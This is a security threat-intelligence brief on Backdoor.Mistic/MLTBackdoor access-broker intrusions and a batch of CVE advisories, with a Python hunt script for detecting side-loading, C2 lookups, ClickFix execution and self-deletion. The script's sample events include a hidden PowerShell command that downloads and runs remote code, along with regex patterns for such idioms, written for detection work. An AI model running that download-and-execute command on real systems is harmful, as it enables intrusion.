ELEVATED · 4 min read · 26 Jun 2026

Backdoor.Mistic / MLTBackdoor access-broker intrusions

Backdoor.Mistic / MLTBackdoor leads today’s 32 findings because it gives SOC teams concrete detection work now. Chrome CVE-2026-13021, GitLab CVE-2026-0934, Lemur credential exposure, and OT and medical advisories add patch and exposure checks across high-value systems. 29 further items tracked below.

Key findings
01
Backdoor.Mistic / MLTBackdoor access-broker intrusions
MEDIUM
[Medium] Backdoor.Mistic / MLTBackdoor is the lead detection item because the reported activity links a self-deleting backdoor to access-broker intrusions that can support later ransomware access.
02
Microsoft Azure Linux 25 June batch needs CERT-FR routing
LOW
[Unverified] Microsoft Azure Linux entered CERT-FR tracking through CERTFR-2026-AVI-0802. Cloud and platform teams should validate Azure Linux image, node, and base-container update channels across workloads that inherit Microsoft-maintained base components.
03
GitLab CE/EE multi-CVE patch batch reaches EU routing with later corroboration
MEDIUM
CVSS 3.8 low · CWE-863 Incorrect Authorization · EPSS 10th percentile. GitLab CE/EE is covered by CERT-Bund, NCSC-NL, and CERT-FR entries, with CVE-2026-0934 named in the brief. Platform and AppSec teams should validate fixed versions, prioritise self-managed and internet-facing instances, and restrict admin and API exposure during rollout.
04
Jenkins Plugins CVE-2026-57280 batch needs CERT-Bund high queue
HIGH
CVSS 8.8 high · CWE-693 Protection Mechanism Failure · EPSS 29th percentile. Jenkins Plugins entered CERT-Bund’s high queue under CVE-2026-57280 and WID-SEC-2026-2074. CI/CD teams should map controllers, enumerate plugin versions, and schedule updates before the next major build window.
05
n8n GHSA batch adds workflow-automation patch triage
LOW
[Unverified] n8n is present in CERT-Bund tracking as WID-SEC-2026-2067. Automation teams should map n8n instances, check vendor fix status, and assess stored workflow secrets and exposed webhooks.
06
Flowise CVE-2025-71332 remains unpatched in CERT-Bund update
MEDIUM
CVSS 5.9 medium · CWE-564 SQL Injection: Hibernate · EPSS 15th percentile. Flowise CVE-2025-71332 remains listed as unpatched in the CERT-Bund update. Teams using Flowise should identify exposed deployments, document exceptions, and restrict access where a fixed version is not yet available for their environment.
07
RabbitMQ CVE-2026-57215 patch batch reaches EU message-broker owners
LOW
[Unverified] RabbitMQ CVE-2026-57215 reached CERT-Bund under WID-SEC-2026-2079. Platform teams should check broker versions, management-plugin exposure, and network reachability for shared messaging clusters.
08
Google Chrome CVE-2026-13021 high-severity advisory needs CERT-Bund and CERT-FR
MEDIUM
CVSS 4.3 medium · CWE-346 Origin Validation Error · EPSS 2nd percentile. Google Chrome CVE-2026-13021 has both CERT-Bund and CERT-FR coverage, giving endpoint teams enough corroboration to check managed patch levels. The check should include Chrome and Chromium on workstations, browser automation images, and internal tooling that packages Chromium components.
09
cURL CVE-2026-8286 patch batch reaches CERT-Bund routing
LOW
[Unverified] cURL CVE-2026-8286 reached CERT-Bund as WID-SEC-2026-2065. Application and infrastructure teams should check systems embedding curl or libcurl, including containers, appliances, language runtimes, and bundled tooling.
10
Podman CVE-2026-57231 information-disclosure advisory needs CERT-Bund
LOW
[Unverified] Podman CVE-2026-57231 reached CERT-Bund as an information-disclosure advisory. Container platform teams should validate Podman versions and confirm packaging sources across developer workstations, build systems, and container hosts.

Backdoor.Mistic / MLTBackdoor access-broker intrusions

Backdoor.Mistic / MLTBackdoor is the lead detection item because the reported activity links a self-deleting backdoor to access-broker intrusions that can support later ransomware access. SOC teams should push hunts for MpExtMs.exe side-loading, EndpointDlp.dll, data.bin, rs2y15sungu[.]com, ClickFix/FileFix execution, and self-deletion behaviour.

Identifiers: Backdoor.Mistic, MLTBackdoor

Sources: [The Register Mistic coverage](https://www.theregister.com/security/2026/06/25/self-destructing-mistic-backdoor-linked-to-access-broker-selling-corporate-footholds-to-ransomware-gangs/5262579); [Security.com Mistic analysis](https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat); [Zscaler MLTBackdoor technical analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-mltbackdoor)
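The hunt items above can be expressed directly as detection logic. The following is an added example, not code from the brief or from any of the cited vendors: it runs over constructed Sysmon-style events and flags MpExtMs.exe executing outside an assumed trusted Defender install root, EndpointDlp.dll loading from the same untrusted directory, a data.bin written into that staging directory, DNS resolution of rs2y15sungu[.]com (defanged form normalised), explorer.exe-spawned script hosts with ClickFix/FileFix-style command lines, and a process deleting its own image file. The event field names, the trusted roots, the ClickFix command-line pattern and every sample event are assumptions to tune against your own telemetry.

```python
"""Hunt logic for the Backdoor.Mistic / MLTBackdoor indicators in the brief.

Added example, not code from the brief or the cited vendors. Events are
constructed in a Sysmon-like shape; field names, trusted install roots and
the ClickFix/FileFix command-line pattern are assumptions to tune locally.
"""
import re

# Indicators taken from the brief
C2_DOMAIN = "rs2y15sungu.com"          # defanged in the brief as rs2y15sungu[.]com
SIDELOAD_HOST = "mpextms.exe"          # signed host binary abused for side-loading
SIDELOAD_DLL = "endpointdlp.dll"       # DLL the host loads
PAYLOAD_BLOB = "data.bin"

# ASSUMPTION: where a legitimate MpExtMs.exe / EndpointDlp.dll is expected to
# live. Replace with the install roots actually observed in your fleet.
TRUSTED_ROOTS = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\",
)

# ASSUMPTION: ClickFix (Run dialog) and FileFix (Explorer address bar) both end
# with explorer.exe spawning a script host; flag those only when the command
# line carries a hidden window, encoded command, URL or download-and-run idiom.
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
CLICKFIX_RE = re.compile(
    r"-w(indowstyle)?\s+h|-e(nc(odedcommand)?)?\s|https?://|\biex\b|invoke-expression",
    re.IGNORECASE,
)


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path):
    return path.lower().rsplit("\\", 1)[0] + "\\"


def _trusted(path):
    return path.lower().startswith(TRUSTED_ROOTS)


def hunt(events):
    """Return (rule_name, event) pairs for every event matching a hunt rule."""
    events = list(events)
    # First pass: directories where an untrusted copy of the host binary ran,
    # so a payload blob dropped into the same staging directory can be tied to it.
    staging_dirs = {
        _dir(e["image"])
        for e in events
        if e["event"] == "ProcessCreate"
        and _base(e["image"]) == SIDELOAD_HOST
        and not _trusted(e["image"])
    }
    hits = []
    for e in events:
        kind = e["event"]
        if kind == "ProcessCreate":
            image = e["image"]
            if _base(image) == SIDELOAD_HOST and not _trusted(image):
                hits.append(("mistic_sideload_host", e))
            if (_base(e.get("parent_image", "")) == "explorer.exe"
                    and _base(image) in CLICKFIX_CHILDREN
                    and CLICKFIX_RE.search(e.get("command_line", ""))):
                hits.append(("clickfix_filefix", e))
        elif kind == "ImageLoad":
            dll = e["loaded_image"]
            if _base(dll) == SIDELOAD_DLL and not _trusted(dll):
                hits.append(("mistic_sideload_dll", e))
        elif kind == "FileCreate":
            target = e["target_filename"]
            if _base(target) == PAYLOAD_BLOB and _dir(target) in staging_dirs:
                hits.append(("mistic_payload_blob", e))
        elif kind == "DnsQuery":
            name = e["query_name"].lower().replace("[.]", ".").rstrip(".")
            if name == C2_DOMAIN or name.endswith("." + C2_DOMAIN):
                hits.append(("mistic_c2_dns", e))
        elif kind == "FileDelete":
            # Self-deletion: the deleting process removes its own image file
            # (or an alternate data stream of it).
            image, target = e["image"].lower(), e["target_filename"].lower()
            if target == image or target.startswith(image + ":"):
                hits.append(("self_delete", e))
    return hits


def rules_fired(events):
    return sorted({rule for rule, _ in hunt(events)})


# Constructed sample telemetry: one intrusion chain plus benign noise.
STAGE = r"C:\Users\alice\AppData\Local\Temp\sync"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/v)"'},
    {"event": "ProcessCreate", "image": STAGE + r"\MpExtMs.exe", "parent_image": PS,
     "command_line": "MpExtMs.exe"},
    {"event": "ImageLoad", "image": STAGE + r"\MpExtMs.exe",
     "loaded_image": STAGE + r"\EndpointDlp.dll"},
    {"event": "FileCreate", "image": PS, "target_filename": STAGE + r"\data.bin"},
    {"event": "DnsQuery", "image": STAGE + r"\MpExtMs.exe", "query_name": "rs2y15sungu.com"},
    {"event": "FileDelete", "image": STAGE + r"\MpExtMs.exe",
     "target_filename": STAGE + r"\MpExtMs.exe"},
    # Benign: host binary under the assumed trusted root, a user opening cmd.exe, ordinary DNS.
    {"event": "ProcessCreate", "image": r"C:\Program Files\Windows Defender\MpExtMs.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "MpExtMs.exe"},
    {"event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "cmd.exe"},
    {"event": "DnsQuery", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "query_name": "www.example.com"},
]

if __name__ == "__main__":
    for rule, event in hunt(SAMPLE_EVENTS):
        detail = (event.get("command_line") or event.get("loaded_image")
                  or event.get("target_filename") or event.get("query_name", ""))
        print(f"{rule:22} {event.get('image', '')}  {detail}")
```

The side-loading rules deliberately key on location rather than hash: the host executable is a legitimate signed binary, so only its path and the path of the DLL it loads distinguish the abuse from normal operation. The self-deletion rule is the weakest signal on its own and is best used to corroborate the others within the same process tree.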

Microsoft Azure Linux 25 June batch needs CERT-FR routing

Microsoft Azure Linux entered CERT-FR tracking through CERTFR-2026-AVI-0802. Cloud and platform teams should validate Azure Linux image, node, and base-container update channels across workloads that inherit Microsoft-maintained base components.

Identifiers: CERTFR-2026-AVI-0802

Sources: [CERT-FR advisory CERTFR-2026-AVI-0802](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0802/)

GitLab CE/EE multi-CVE patch batch reaches EU routing with later corroboration

GitLab CE/EE is covered by CERT-Bund, NCSC-NL, and CERT-FR entries, with CVE-2026-0934 named in the brief. Platform and AppSec teams should validate fixed versions, prioritise self-managed and internet-facing instances, and restrict admin and API exposure during rollout.

Identifiers: CVE-2026-0934, WID-SEC-2026-2070, NCSC-2026-0211

Sources: [CERT-Bund WID-SEC-2026-2070](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2070); [NCSC-NL advisory NCSC-2026-0211](https://advisories.ncsc.nl/advisory?id=NCSC-2026-0211); [CERT-FR advisory CERTFR-2026-AVI-0799](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0799/)

Jenkins Plugins CVE-2026-57280 batch needs CERT-Bund high queue

Jenkins Plugins entered CERT-Bund’s high queue under CVE-2026-57280 and WID-SEC-2026-2074. CI/CD teams should map controllers, enumerate plugin versions, and schedule updates before the next major build window.

Identifiers: CVE-2026-57280, WID-SEC-2026-2074

Sources: [CERT-Bund WID-SEC-2026-2074](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2074)

n8n GHSA batch adds workflow-automation patch triage

n8n is present in CERT-Bund tracking as WID-SEC-2026-2067. Automation teams should map n8n instances, check vendor fix status, and assess stored workflow secrets and exposed webhooks.

Identifiers: WID-SEC-2026-2067

Sources: [CERT-Bund WID-SEC-2026-2067](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2067)

Flowise CVE-2025-71332 remains unpatched in CERT-Bund update

Flowise CVE-2025-71332 remains listed as unpatched in the CERT-Bund update. Teams using Flowise should identify exposed deployments, document exceptions, and restrict access where a fixed version is not yet available for their environment.

Identifiers: CVE-2025-71332, WID-SEC-2025-0717

Sources: [CERT-Bund WID-SEC-2025-0717](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0717)

RabbitMQ CVE-2026-57215 patch batch reaches EU message-broker owners

RabbitMQ CVE-2026-57215 reached CERT-Bund under WID-SEC-2026-2079. Platform teams should check broker versions, management-plugin exposure, and network reachability for shared messaging clusters.

Identifiers: CVE-2026-57215, WID-SEC-2026-2079

Sources: [CERT-Bund WID-SEC-2026-2079](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2079)

Google Chrome CVE-2026-13021 high-severity advisory needs CERT-Bund and CERT-FR

Google Chrome CVE-2026-13021 has both CERT-Bund and CERT-FR coverage, giving endpoint teams enough corroboration to check managed patch levels. The check should include Chrome and Chromium on workstations, browser automation images, and internal tooling that packages Chromium components.

Identifiers: CVE-2026-13021, WID-SEC-2026-2071

Sources: [CERT-Bund WID-SEC-2026-2071](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2071); [CERT-FR advisory CERTFR-2026-AVI-0801](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0801/)

cURL CVE-2026-8286 patch batch reaches CERT-Bund routing

cURL CVE-2026-8286 reached CERT-Bund as WID-SEC-2026-2065. Application and infrastructure teams should check systems embedding curl or libcurl, including containers, appliances, language runtimes, and bundled tooling.

Identifiers: CVE-2026-8286, WID-SEC-2026-2065

Sources: [CERT-Bund WID-SEC-2026-2065](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2065)

Podman CVE-2026-57231 information-disclosure advisory needs CERT-Bund

Podman CVE-2026-57231 reached CERT-Bund as an information-disclosure advisory. Container platform teams should validate Podman versions and confirm packaging sources across developer workstations, build systems, and container hosts.

Identifiers: CVE-2026-57231, WID-SEC-2026-2062

Sources: [CERT-Bund WID-SEC-2026-2062](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2062)

Also tracked

  • OpenBSD CVE-2026-57589 privilege-escalation advisory appears in EU feed · CVE-2026-57589 · High
  • Drupal CVE-2026-13231 medium-severity batch needs CERT-Bund routing · CVE-2026-13231 · Unknown
  • Snipe-IT CVE-2026-55452 asset-management advisory needs CERT-Bund · CVE-2026-55452 · Unknown
  • Zammad WID-SEC-2026-2075 file-deletion advisory needs EU support-desk queue
  • PowerDNS Authoritative Server CVE-2026-42005 DoS advisory needs CERT-Bund · CVE-2026-42005 · Medium
  • runc (CLI tool for spawning and running containers on Linux) advisory · CVE-2024-21626 · Unknown
  • Linux Kernel CVE-2026-52944 batch needs CERT-Bund high-severity routing · CVE-2026-52944 · Not scored
  • ProFTPD CVE-2026-35025 unpatched high-severity advisory · CVE-2026-35025 · High
  • DENX U-Boot CVE-2026-46728 security-bypass advisory needs EU feed · CVE-2026-46728 · High
  • pydicom pynetdicom Library reaches CISA medical advisory queue · CVE-2026-56445 · High
  • H.VIEW HV-500S6 IP Camera needs CISA ICS exposure queue · CVE-2026-55975 · Unknown
  • EVoke Systems charging-station management flaws allow unauthorised control · CVE-2026-40702 · Critical
  • Daktronics Controller Firmware path traversal/default-credential batch can reach root control · CVE-2026-28701 · Unknown
  • OHIF DICOM viewer SSRF can leak clinician OIDC bearer tokens · CVE-2026-12473 · High
  • Delta Electronics DTM Soft deserialization issue enables code execution · CVE-2026-12578 · Unknown
  • Horner Automation Cscape advisory needs engineering workstation owners · CVE-2026-12897 · High
  • Schneider Electric PowerLogic P7 advisory adds energy OT patch routing · CVE-2026-9716 · High
  • Yokogawa FAST/TOOLS and CI Server advisory targets SCADA owners · CVE-2026-11833 · High
  • Lemur ACME SSRF plus creator-equality IDOR can expose AWS IAM and PKI keys · CVE-2026-55166 · Critical
  • GitHub MCP Server lockdown singleton can mix cross-user GraphQL clients · CVE-2026-48529 · Medium
  • Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks
  • GitHub Updates actions/checkout to Block Common Pwn Request Attack Patterns
  • HP LaserJet Pro backup/restore CVE patch batch reaches NVD feed · CVE-2023-35176 · High
  • Portwell Engineering Toolkits CVE-2026-3437 local memory read/write path · CVE-2026-3437 · Critical
  • The Patch Fixed the Bug. Nobody Fixed the Configuration. · CVE-2024-40766 · Unknown
  • CL-STA-1062 / UAT-7237 TinyRCT campaign targets government and critical energy
  • CL-STA-1062 Targets Southeast Asian Governments and Critical Infrastructure
  • Malicious hackers exploit Cisco zero-day for highest access level at communications service provider
  • StealC You Later: Proofpoint and IBM X-Force Support Operation Endgame Disruptions
Tags: cve-2025-71332, cve-2026-0934, cve-2026-13021, cve-2026-57215, cve-2026-57231, cve-2026-57280, cve-2026-8286, mistic, mltbackdoor, otsecurity
